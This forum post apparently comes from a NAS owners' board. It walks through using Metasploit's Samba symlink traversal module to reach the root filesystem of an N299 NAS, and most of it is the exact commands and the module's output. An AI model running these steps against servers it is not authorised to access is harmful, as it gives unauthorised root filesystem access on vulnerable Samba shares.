General NAS-Central Forums

Welcome to the NAS community
It is currently Sun Mar 18, 2018 1:50 pm

All times are UTC

Post new topic Reply to topic  [ 1 post ] 
Author Message
PostPosted: Sat Oct 06, 2012 9:15 am 

Joined: Thu Oct 04, 2012 1:50 pm
Posts: 1
NOTE: Because Video folder is scanned by Media Server you must stop it from NAS menu before this exploit.
In order to access root filesystem of N299 we will use linux Back Track.

Launch a terminal window and from the terminal we run
After some loading the prompt will be msf >.
At this prompt we type search samba and we wil have a list with available exploits:

msf > search samba

The command will list all available exloits.
Load the first one with the command:
msf > use auxiliary/admin/smb/samba_symlink_traversal

Let's see what are the options:
sf  auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

Let's set the options:

msf  auxiliary(samba_symlink_traversal) > set RHOST (change the IP addres with your own NAS IP addres)
msf  auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from NAS menu to be writtable for everyone)
msf  auxiliary(samba_symlink_traversal) > set RPORT 139
msf  auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder were the root directory will be mount in the Video folder)

Now we run the command exploit:
msf  auxiliary(samba_symlink_traversal) > exploit

Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \\Video\roothack\
Auxiliary module execution completed

Now if you go to network folder Video you will see a folder roothack with all the files of root filesistem

Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 1 post ] 

All times are UTC

Who is online

Users browsing this forum: No registered users and 7 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB® Forum Software © phpBB Group